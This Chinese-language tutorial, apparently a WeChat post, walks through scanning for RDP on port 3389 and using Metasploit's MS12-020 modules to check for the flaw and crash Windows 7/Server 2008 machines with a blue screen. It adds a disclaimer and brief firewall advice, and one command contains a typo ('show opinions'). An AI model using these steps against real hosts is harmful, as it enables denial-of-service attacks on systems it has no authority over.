Kali Linux 利用MS12-020实施死亡蓝屏攻击

声明：本公众号【最全资料库】所有分享仅做学习交流，切勿用于任何不法用途，否则后果自负！

3.22晚编辑，当你们看到此文时应该已经是3月23日了，亲爱的同学们，期待您的打卡！

一、MS12-020漏洞介绍

全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞

概要:MS12-020是一个针对远程桌面(RDP)协议的漏洞，其最严重的情况可能会造成远程执行代码，而通常情况下会造成对方蓝屏。

本教程给大家演示如何利用MS12-020漏洞实现死亡蓝屏攻击

二、环境准备

黑客方:kali Linux

受害者:Windows7或 Windows Server 2008

三、攻击过程复现

1、Nmap扫描受害者计算机是否开启3389端口

nmap -p 3389 + IP

2、启动msfconsole， 查询漏洞利用模块

search ms12-020

3、加载漏洞检查模块，查询是目标系统是否存在相应漏洞

use auxiliary/scanner/rdp/ms12_020_check

4、查看配置选项

show options

5、设置目标主机

set rhosts + IP

6、发起攻击

run

从以上步骤，可判断目标系统是否存在MS12-020

漏洞，当确定存在相应漏洞后，继续执行以下命令，进行死亡蓝屏攻击。

1、加载蓝屏攻击模块

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

2、查询配置选项

show opinions

3、设置目标主机

set rhosts + IP地址

4、发起攻击

run

5、查看目标主机是否蓝屏

四、防范措施

1、开启防火墙或者关闭3389端口

2、若需要用，就对防火墙配置策略，允许哪些IP才可以访问你RDP协议